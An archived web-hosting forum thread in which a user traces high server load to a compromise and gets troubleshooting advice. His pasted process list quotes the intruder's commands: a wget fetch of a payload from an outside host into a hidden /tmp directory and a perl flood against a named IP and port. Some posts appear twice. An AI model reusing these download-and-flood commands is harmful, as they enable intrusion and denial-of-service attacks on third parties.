I have a question, my CPU usage seems to be off the scale these days. My server is the 2.4 Celeron plan, but things shouldn't be this bad. It started off a few days ago with CPanel reporting random users using 90%+ of the CPU for more than 6 hours, then yesterday nobody was using 2.11 of it, and then today I have nobody using a whooping 68.11 (I believe this is 6811%).
Orbit is no help, I have to pay an hourly fee for them to find out whats wrong. I checked the number of MYSQL processes running, zero.
This problem doesn't occur all the time, it seems to be random, usage stays at around 0.05 on some days all day round, but it's friggin annoying to get this 3-4 days a week.
I've used chkrootkit and says bindshell but I heard that's normal. Says possible slapper, I manually checked for the bugtraq files in the tmp, but they werent there so false alarm I guess... Can someone please tell me whats wrong?
Jack
Full Version: Load 68.11??
Maybe your server has been comprimised?
I'd talk with Rack911.com they are very, very knowledgeable, and charge very little. Many people at WHT are very happy with them.
I'd talk with Rack911.com they are very, very knowledgeable, and charge very little. Many people at WHT are very happy with them.
I would ask since you say it's not a all the time thing, can you monitor the box and report back which applications are running at X% if you can do this for about and hour a day for the next 2 - 3 days.
I would also like you to note is the times in which this is happening. In addition you will need to figure out what your peek usage time is versus normal activity time.
By doing this you may be able to isolate the issue and support could better assist you in this issue.
I would also like you to note is the times in which this is happening. In addition you will need to figure out what your peek usage time is versus normal activity time.
By doing this you may be able to isolate the issue and support could better assist you in this issue.
Alright, I am compromised 
A group of entries doing dos attacks:
nobody 27789 0.0 0.2 5312 1048 ? S 15:19 0:00 sh -c (sleep 55555;killall -9 udp) &
nobody 27790 0.0 0.1 4928 536 ? S 15:19 0:00 _ sleep 55555
nobody 11665 0.0 1.1 16224 5828 ? S 11:44 0:04 _ /usr/local/apache/bin/httpd -DSSL
nobody 27778 0.0 0.2 5312 1060 ? S 15:19 0:00 | _ sh -c echo _START_; cd /tmp;mkdir .s.PGSQL.;cd .s.PGSQL.;wget www.umhroot.org/trip/db;
nobody 27787 53.9 0.2 6388 1048 ? R 15:19 173:37 | _ perl db 207.44.180.101 =80 55555
Guess I'll do a os reload sometime soon, what a hassle, have no idea how this happened. But is there any way I can automatically stop the db process?
Jack
EDIT: I've checked bash history, that guy didn't clean it, cleared all the files out of those directories he stuffed the dos programs in, disabled wget, lynx, who and gcc, hope this works b4 I do a reload
EDIT2: w00t fixed! Having a different problem now, every day at around midnight my account gets 32000 spam messages which puts exim off the scales, is there any way to solve this problem without having to terminate the account?
A group of entries doing dos attacks:
nobody 27789 0.0 0.2 5312 1048 ? S 15:19 0:00 sh -c (sleep 55555;killall -9 udp) &
nobody 27790 0.0 0.1 4928 536 ? S 15:19 0:00 _ sleep 55555
nobody 11665 0.0 1.1 16224 5828 ? S 11:44 0:04 _ /usr/local/apache/bin/httpd -DSSL
nobody 27778 0.0 0.2 5312 1060 ? S 15:19 0:00 | _ sh -c echo _START_; cd /tmp;mkdir .s.PGSQL.;cd .s.PGSQL.;wget www.umhroot.org/trip/db;
nobody 27787 53.9 0.2 6388 1048 ? R 15:19 173:37 | _ perl db 207.44.180.101 =80 55555
Guess I'll do a os reload sometime soon, what a hassle, have no idea how this happened. But is there any way I can automatically stop the db process?
Jack
EDIT: I've checked bash history, that guy didn't clean it, cleared all the files out of those directories he stuffed the dos programs in, disabled wget, lynx, who and gcc, hope this works b4 I do a reload
EDIT2: w00t fixed! Having a different problem now, every day at around midnight my account gets 32000 spam messages which puts exim off the scales, is there any way to solve this problem without having to terminate the account?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.